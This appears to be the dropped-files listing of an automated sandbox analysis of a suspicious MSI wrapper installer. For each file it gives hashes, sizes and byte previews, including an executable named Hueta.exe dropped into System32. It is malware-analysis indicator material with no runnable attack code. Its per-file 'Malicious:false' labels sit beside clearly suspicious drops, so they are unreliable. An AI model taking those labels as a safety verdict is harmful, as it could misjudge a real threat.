                                                                                                                SSDEEP:98304:mdyAZrci4ejZiZylqpt3jtiDeqBKpmlbJdoGliPrptXWYxRwkURVtldGPn:eZZDZiIqpt3jIj0pmhfxliPrTXv3cG
                                                                                                                MD5:CD05164818C9D8380B58C845DD2BB20E
                                                                                                                SHA1:E06735BF609310EB0C9D6FC1537F833C32CD5839
                                                                                                                SHA-256:47F4876626CE8CEF86BC0E4FB8228923C86E78693974EFC89706EF38340CA320
                                                                                                                SHA-512:B6F0072CC6C2E5E81CE4CCE65DCB2F426F5767E89A3B793E5B628694F0E034B09DF78F39B6C09813038715C3B9DB74F1E5FCF142C6A81E5D83F1AC832E55456A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.*zp.D)p.D)p.D)..A(..D)..G(x.D)n..)r.D)...)q.D)..G(z.D)..@(a.D)..A(..D)..B(q.D)..E(}.D)p.E)..D)..@(d.D)..@(1.D)..A(a.D)...)q.D)..F(q.D)Richp.D)........PE..d...P.2h.........."....,......G................@..............................R...........`.................................................D.Q.......R......PR..m............R..... .P.......................P.(.....P.@...............0............................text.............................. ..`.rdata...:F......<F.................@..@.data...lJ....R.......Q.............@....pdata...m...PR..n....R.............@..@.fptable......R.......R.............@....rsrc.........R.......R.............@..@.reloc........R.......R.............@..B................................................................................................................................................................................

                                                                                                                C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.ini

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1430
                                                                                                                Entropy (8bit):3.699342228716139
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:f3dX8DW8XjHXwy4BESIFEkd9EgHzkd9EgHNyJkd9EgH+1/MnqleWKln:fYbgymmFEkd9zTkd9ztykd9zA/MzF
                                                                                                                MD5:C146F29A3C0254A09C3CD21A413C754F
                                                                                                                SHA1:4119F2458AFEC24FFECB2DBB13F528BB176CC825
                                                                                                                SHA-256:A007EBCF99414FE31D3A7BC891AC8E3312C11C26B177961BCB67A257182D0D88
                                                                                                                SHA-512:8D317AE2D836C7428279435BC791DCE76C5461F9499B1E97328B08F5B6F2653EF7F90119E8811206BBF2A92494EC3CFE9C5A8B68009D151CD9EA5F76291F603E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:W.r.a.p.p.e.d.A.p.p.l.i.c.a.t.i.o.n.I.d.=...W.r.a.p.p.e.d.R.e.g.i.s.t.r.a.t.i.o.n.=.H.i.d.d.e.n...I.n.s.t.a.l.l.S.u.c.c.e.s.s.C.o.d.e.s.=.0...E.l.e.v.a.t.i.o.n.M.o.d.e.=.n.e.v.e.r...B.a.s.e.N.a.m.e.=.0.x.B.K.H.F.I.S.Y.H.P.X...e.x.e...C.a.b.H.a.s.h.=.4.9.7.5.f.9.2.d.f.3.6.3.c.7.0.1.a.4.8.3.b.8.d.b.e.8.f.c.3.f.4.5.7.1.1.4.2.9.f.d.7.e.1.8.c.1.9.4.1.9.7.5.2.2.d.e.5.f.2.a.3.1.1.1...S.e.t.u.p.P.a.r.a.m.e.t.e.r.s.=...W.o.r.k.i.n.g.D.i.r.=...C.u.r.r.e.n.t.D.i.r.=.*.S.O.U.R.C.E.D.I.R.*...U.I.L.e.v.e.l.=.2...F.o.c.u.s.=.n.o...S.e.s.s.i.o.n.D.i.r.=.C.:.\.U.s.e.r.s.\.M.a.o.g.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.e.f.3.6.8.c.0.-.5.a.b.a.-.4.8.b.b.-.9.1.5.7.-.d.0.4.0.e.4.f.9.9.f.2.d.\...F.i.l.e.s.D.i.r.=.C.:.\.U.s.e.r.s.\.M.a.o.g.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.W.-.8.e.f.3.6.8.c.0.-.5.a.b.a.-.4.8.b.b.-.9.1.5.7.-.d.0.4.0.e.4.f.9.9.f.2.d.\.f.i.l.e.s.\...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.F.i.l.e.=...R.u.n.B.e.f.o.r.e.I.n.s.t.a.l.l.P.a.r.a.m.e.t.e.r.s.=...R.u.n.A.f.t.e.r.I.n.s.t.a.

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dduqm0ft.0hx.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ev1stzcf.drx.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vesidkki.pnh.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y52dqpn0.kyj.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\gr0D62WdkfOXqpbHbRHp

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):2433536
                                                                                                                Entropy (8bit):6.724261802266527
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:AQrmlMuJ7KuG8dlfMXZSdq/piMRMreD8BoMiNjzgoiUbOaNChGaDp:A2Lb6reDCOahGaD
                                                                                                                MD5:DA85724F03F3F7C3B464077FF22F468D
                                                                                                                SHA1:2618850F77A5BADEB0C2581E3FFA93EE8FC80F7B
                                                                                                                SHA-256:2B6DC5BEF1E55AA8E7DD9751A57F6BC1F0C3F2BEF6DA6F5E9529A32F8BE78127
                                                                                                                SHA-512:19B69B984ECB15D96D8AC39DD8C5192E7A39D5B97020210308B9D90C362E476752774A42E8830DF95F97350554B2689F20670C0661C515D95B50D461D78AB885
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...g@6h......................%..v..W..........@............................../......q%...`... .........................................................8.....$..i............/..............................m$.(...................x................................text...............................`..`.data...0...........................@....rdata..@..... ....... .............@..@.pdata...i....$..j...X$.............@..@.xdata..PO....$..P....$.............@..@.bss.....v...@%..........................idata................%.............@....CRT....0.............%.............@....tls..................%.............@....rsrc...8.............%.............@..@.reloc......../.......%.............@..B........................................................................................................................................................................

                                                                                                                C:\Windows\Installer\MSI5BF4.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Winwrapper 0.0.0.0, Subject: Winwrapper, Author: Winx86, Keywords: Installer, Template: Intel;1033, Revision Number: {D0826328-C10E-4DA1-9E4B-BD822747186A}, Create Time/Date: Thu Jan 11 14:59:44 2024, Last Saved Time/Date: Thu Jan 11 14:59:44 2024, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (11.0.53.0), Security: 2
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5902336
                                                                                                                Entropy (8bit):7.983139724874384
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:YpcvWejdg5NVPL2qOATqC/8W1eafXsADr1LG6hokpNF3BqgQU2Rcql9BJv:rvWcwVPBOATqCUdQXsIxa6hok3FgQiBF
                                                                                                                MD5:FE15391D02959F3396244A1643DAECA6
                                                                                                                SHA1:B1CC2680A4D08DE6758A2D21D5254E1C38C23191
                                                                                                                SHA-256:772456E2F4A764D716E6D9E1302F8E54E03D125E5894778E52093EF349BF520A
                                                                                                                SHA-512:CCC4E03F4B6DEBD7C6F15098A13E6F618CE24F4D9FFC1BEC89E85F816B1597A2ADB35090CF2EEDD4AE767BC0E750915AE8506188C65346A6EC61FD19B3865917
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......................>.......................................................;.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Windows\Installer\MSIE1FD.tmp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                Category:modified
                                                                                                                Size (bytes):212992
                                                                                                                Entropy (8bit):6.513409725320959
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:xspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCL42loHUvU0yGxr5GqM2a8:jtOdiRQYpgjpjew5DHyGxcqo8
                                                                                                                MD5:0C8921BBCC37C6EFD34FAF44CF3B0CB5
                                                                                                                SHA1:DCFA71246157EDCD09EECAF9D4C5E360B24B3E49
                                                                                                                SHA-256:FD622CF73EA951A6DE631063ABA856487D77745DD1500ADCA61902B8DDE56FE1
                                                                                                                SHA-512:ED55443E20D40CCA90596F0A0542FA5AB83FE0270399ADFAAFD172987FB813DFD44EC0DA0A58C096AF3641003F830341FE259AD5BCE9823F238AE63B7E11E108
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p...p...p.......p.....p..../.p.......p...q.%.p.......p.....p.....p.Rich..p.........................PE..L...Y..e...........!.....h..........K................................................]....@.........................P...]............P.......................`.....................................p...@...............t............................text....f.......h.................. ..`.rdata...............l..............@..@.data....5..........................@....rsrc........P......................@..@.reloc...)...`...*..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):1.213226866353334
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:K3QuuAsrMFFXO7T5jOLddS+ubyWuSi83rddSs6rLOvq:kQS2TcLTayWWOYEq
                                                                                                                MD5:D77E942C5D5D66F8052ABA002F2254D9
                                                                                                                SHA1:0EA9346ACDE6ADEE5800B92FAD7485F1F268E2A8
                                                                                                                SHA-256:0C041E31D3BCFA19ADA3E284D82A71D2DD60126F56DCCBFDC59828DCE3D0FF3B
                                                                                                                SHA-512:5011BFFDA9A560150C8436F2548C54D805D1CE09291DEF22ECFB0D479C5377CFA85405B77B1F2D65B03425C5EC9F32A32FC9C4BB431A29AFBE8A1551D35912F8
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Windows\Logs\DPX\setupact.log

                                                                                                                Download File
                                                                                                                Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                File Type:CSV text
                                                                                                                Category:dropped
                                                                                                                Size (bytes):13860945
                                                                                                                Entropy (8bit):5.114073794443206
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:AgfxNj1/VLRTFP8GYoism8ynpJkWZfVj6QTTBN:K
                                                                                                                MD5:1196AA446B8F27B5FA4ABE08E3C91DEF
                                                                                                                SHA1:23B7DBF64055F0F8323513B1626D66F78B33B4DA
                                                                                                                SHA-256:F240E8781DC390746BF0520BD8FA20D607BBFE7C2BB48F9B54E3876236FC9A40
                                                                                                                SHA-512:7AB870219AB8E5F7E6D53CAB4EF5808904984C948A71B18EDC8795320A5D1FFA6F050CD710DF21521214A47434249864668C6C45B36DE5F60975B4F7E4A735D7
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.2024-12-09 19:23:54, Info DPX Started DPX phase: Resume and Download Job..2024-12-09 19:23:54, Info DPX Started DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:54, Info DPX Ended DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:54, Info DPX Started DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:54, Info DPX Ended DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:54, Info DPX CJob::Resume completed with status: 0x0..2024-12-09 19:23:54, Info DPX Ended DPX phase: Resume and Download Job..2024-12-09 19:23:56, Info DPX Started DPX phase: Resume and Download Job..2024-12-09 19:23:56, Info DPX Started DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:56, Info DPX Ended DPX phase: Apply Deltas Provided In File..2024-12-09 19:23:56, Info

                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):455581
                                                                                                                Entropy (8bit):5.381755824944483
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:CpI1rhwukl2UFY+ikDR9KjVWHq+BqLBOhajc9ijF2JtsxcBS1J3BM0Aa+iVbwebk:DKboSBv
                                                                                                                MD5:0EDB9ADBF992BE4CED5E6A4F228B4EA4
                                                                                                                SHA1:6D69623D11B3D9E3E9691648F9ECB8F00D76063A
                                                                                                                SHA-256:48C7ADFAADE7351D7AAE9776A95DBBA073E905FDB487359C427D9FD5E44AB3DA
                                                                                                                SHA-512:1DF37FE5ADDF24960F73748710F0125F4A92E702C2F1BA4FB382B5F85FB7C33F338932679ED1AA91B26053DFD3A3AC017D41EB5A141BADAC8313ECABA4237556
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..05/07/2022 07:40:26.485 [3724]: Command line: D:\wd\compilerTemp\BMT.ijbjbjy2.cay\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..05/07/2022 07:40:26.516 [3724]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..05/07/2022 07:40:26.547 [3724]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..05/07/2022 07:40:26.547 [3724]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..05/07/2022 07:40:26.547 [

                                                                                                                C:\Windows\System32\Hueta.exe

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):12507648
                                                                                                                Entropy (8bit):6.703651389254846
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:196608:8+RuJqPuEzCdkhotmtsE+XywYS7Xp+0RTInZ:RRYyuEzCdkhomtsE+XywYS7Xp+PnZ
                                                                                                                MD5:0DE3703CFCBA4D443154324202F37212
                                                                                                                SHA1:5FBB65D97BF2659508A67CA8142B2C65743132E8
                                                                                                                SHA-256:B6DB32F492E574ED37BDDF188E99600EDA8A82F4F61F135E742467F76849B793
                                                                                                                SHA-512:42FCA7CA94F94E433449930AA7F4619D77CCEA6A88A1F11DD374BF7DD99E7E6FAF01ED53F7E063C8C62DF97A9E4A79D912D0AD0CF846EAD13FA7F812406D9E8F
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....83h.........."....+......2.....L}.........@.............................0.......F....`..................................................K...................u..............,...............................(.......@............ ...............................text............................... ..`.rdata...O*.. ...P*.................@..@.data........p.......d..............@....pdata...u.......v...D..............@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                C:\Windows\SystemTemp\~DFF7DE60EC351684EB.TMP

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):81920
                                                                                                                Entropy (8bit):0.1055666157245908
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:qnvqwVMJfAebfddipVW2XddipVguVJWpG6WsGgSi+T3Sk2sjk3P+s:UvqwMrfddSsIddS+ubyWuSi83+z
                                                                                                                MD5:CCBF0FC5C49B9F2C572D987CA4CB3F25
                                                                                                                SHA1:EAC7841E08C4D5169C513B6DFA54C382C57CFF87
                                                                                                                SHA-256:E632EB4379081403A47BC7B984E27D3239A948EA67E22F9227D4108CC9BD42F5
                                                                                                                SHA-512:270845718CC4AF5D6D42F09264938BD41D6FA0546770E63A15523AC22E23A3B2D4CF17F3D32B6EC143AFFA29A935674F2E283C370AB0C2E43B355EEDF160C0BB
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                Chrome Cache Entry: 229

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 863
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):389
                                                                                                                Entropy (8bit):7.341438241237442
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:Xtbq78zTN13UGOdc4rIxjzsiCBfHmvjsN4SmDWk/ZMqdpFjpG+peIwPTiYtYIet8:Xs8vN1UGO24WjzB2f4Smyk/rlmrhI8
                                                                                                                MD5:3E72886F6A7DA192D5587AA831D0FD56
                                                                                                                SHA1:4CEE93F71D36B4A53719CDE6926F8105CEDF3C2E
                                                                                                                SHA-256:8268C55DDEED61EC811B0783A913B5E9CFEE6EC95ACFFD65FEC7E447AC77530A
                                                                                                                SHA-512:D37C08DDDEFF8D49D602EE5D341241B482264ADF957FD6B59D80811ED8BA8587C0F4EA0C52EC98989AB6623EFD0B952BC55D3D401EE33D37C3B93D66EC4D446A
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Oleo+Script&display=swap
                                                                                                                Preview:............n. ..w?.[...\.8Km.j.*C........I...^0$c..].......<Fe........t.+...4C_.B.NE......j...E....T.e...nOIy.dE~T!......l.D7...1..MC...T#C.M...R.'...>a.k=T.3..p.\..E...u.A....M...|.M...@Gz.~...z....*.z..mR..... .>.8z4@c...-...s..........f..6..$.1.q_D6.6+..j..)P...........!.>.BW.......(.b.}{.......,....7p...S_/S'36fo..N.3..o..iOa..E.....f......V.............K.c_...

                                                                                                                Chrome Cache Entry: 230

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1212
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):449
                                                                                                                Entropy (8bit):7.434399295707351
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XXeuY+F8bGt8MWixAJfHQYAMfgwgyUl3YQlNZmIRhf/:XYtqmNQ2fg0Kxhf/
                                                                                                                MD5:9AFFF9F5259591A2F7AE63581CF4B18F
                                                                                                                SHA1:6F284C269D29D846558653896896DDE2FD456C6C
                                                                                                                SHA-256:C7AF58BDB0309A65F99BBF40BD6ADB71379496658A11C46484DC9AE0056D27C3
                                                                                                                SHA-512:AE9424C8322555E82A75E8281B4F1695B8706DCADF527AC35AACA637DBA1BBF666D23EE9CD869C7A4BA78941B9D30124FE1AE53D0CBED219158BC727A0440FA0
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Alata&display=swap
                                                                                                                Preview:...........;o.0.Fw..nN..|(.be.. ..:td.....c2q.........-..C^]R..t.z0....o..%....6#.i..SA..N....;.. .t.t..=.n.s..a.2...}...=.... ..j......2..Z.]...i..j..}.~}895.]s|.2..t~...&..i......]...}..k.G.....#~..8..<...8..<.........A.2.eR..,@.`%e.!.p.p.!6HE.c`.@C.....n.sF........>.......D)C"....U.*.P!4.u...eJa....H....U..C.FP..b.a.,..#..U\.<..U..U.^..`.......O.$.yI...)^...wV).+..wY.zB.u.7U..,C!......5.1j....5Q(R)U{...............

                                                                                                                Chrome Cache Entry: 231

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:gzip compressed data, max compression, original size modulo 2^32 1439
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):513
                                                                                                                Entropy (8bit):7.55779498182656
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:XNvjwaL/qKh09m/RhG3KKXI2n4WuMo6opVJDqNoUtABBNXuw2+8:XVjbL/xi9mp3MI2480V9VtBNXW
                                                                                                                MD5:90FBC095DEBC95D520E85C9CB3ABF0EF
                                                                                                                SHA1:BC3A1438B0F6F9F9F0BB948C991C58BB7A86B781
                                                                                                                SHA-256:288DD6B36BD97B14EF65678FD074FC390A368AFA266F67191BCC2174539DD925
                                                                                                                SHA-512:CE08451E478FD2364E9533753FBD84DFB3590A2B765B7265875B36BAD3718E5FF3DA5E9E2E5813FB94AD5EDDC73619ADF35AB16822D3E265965EB5DE4B58BB64
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                URL:https://fonts.googleapis.com/css2?family=Anek+Bangla&display=swap
                                                                                                                Preview:...........]o.0....+|.....N.4....k........Y.D...GW!.;...v......c..'}..@...E.w...z.TyQ.?3.,.....y..P..u../.O'y........c......g.c).&F..7O.w..rx~:.{.;.E....r?...e=.\...v.....Vw..&......x.....vH.6WA....|{.=.U.....ln.ln7c....u..~d....N..PU..:...gs..s..}...]..k.oq.....NC...|.k. 2..ql....X..k......&..$.%.*..3..n .t...L.\..........A.F....B.}..T.......,T.,d.<4.U...<...6I....a.S]D2.YdAP.s.b.M&..&......!.N.@....$..IB!.k...._.H8V..G<b..,...T....:.#....S.<...0..R...i..M=r.....+...........hT....

                                                                                                                Chrome Cache Entry: 232

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Zstandard compressed data (v0.8+), Dictionary ID: None
                                                                                                                Category:dropped
                                                                                                                Size (bytes):31
                                                                                                                Entropy (8bit):4.220167681284828
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Wl25NXFMCERaln:L5LuRal
                                                                                                                MD5:DAC29F868FFB0FA7624A040847BDBB6C
                                                                                                                SHA1:FA10B51AD2CEBBC4538BE0087BDEE8C1B44C7BA9
                                                                                                                SHA-256:EBDE04EA29A52A67E47CFCE688878BDA6E96CA57486B17D24A1608AE036A3C96
                                                                                                                SHA-512:050A8707C708C95F0C40C18833A0B7855509163254704F6B4CD8A2CF0B047A9CB5AED15B72793E2C3E15628647289A9C924432D3CA5795E8BC9505F1930EEEE3
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:(./..X...This is a check route.

                                                                                                                Chrome Cache Entry: 233

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 650 x 216, 8-bit colormap, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15854
                                                                                                                Entropy (8bit):7.945017242790007
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:CwbQPC+2pTgHXgWPOL1wswTdAuI00xmR90n7qf1TUMO3JD:p0PQp2XgBfyyu0IRHf1TUMQ
                                                                                                                MD5:BE88A6473B0112378C365C15925D4E0E
                                                                                                                SHA1:098475D8955E306D92772A90191DE9994155C9A9
                                                                                                                SHA-256:1032D5AB42ADE809145A6F26FFAD9CAA64C666597CD21DA498EA71009724EAD4
                                                                                                                SHA-512:6720875902A368ABFC7DB83445F75EB204A4C715074EFBD9A4D491AABC57662678CBE9C67FD9B8B9B85D03CD76E16CA2778F7CF439A33F594653DD8F96779802
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:.PNG........IHDR.............[s2k...rPLTE..................................................................................................................^XA....%tRNS......W+..#.g.....NB;{_.s...15...nHkR....=.IDATx..v.*.@..PE.Y...........l.n..g'.r3....c..X.[..nG.5...n/|..|-.-.q..&2{..s..!..Rx...c..<./J.^-..D.b...`....:l$ta$.B...?-....."i....ai...1.\.._.\..q.^._...C.....*..f...*z..u].H.f......~j.v..0.....4.3.k.h...H.g.$Y%I...s...G.e.X ..d..D..h.C../W...\Vq5.Gf........9p...gR.<.......VQ.Q....A....Y..i.....r......,..xi.i.....w(..P.V...W.7g..A.%../Q....{T. .d..".W....rU.3.HQQ,..!..Y..v.U.._B..7...&.+TU......&....6...;x.(I..8k....u.J&.j..1bi.....Y_..Hol_.b..........YQ...T.T.U...G.BE5+&..JU....L.h..LqHR.Q..p..?p..f6.....d..XWq.M..C.........T...t.w.....b.R#.[........Rl.U..F>.d.n.:I<.SR...q.....D..b8.....a?...+..X/Q..il.g.b#.Q.....0..%.-..........4.Q..<..[.1...82... ..m.s.,.B ..<.@.r<.o_.m....EE..wHy.c......LC...".I..VLO4..9l.f.l.0....._......G....G>.

                                                                                                                Chrome Cache Entry: 234

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 650 x 216, 8-bit colormap, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):15854
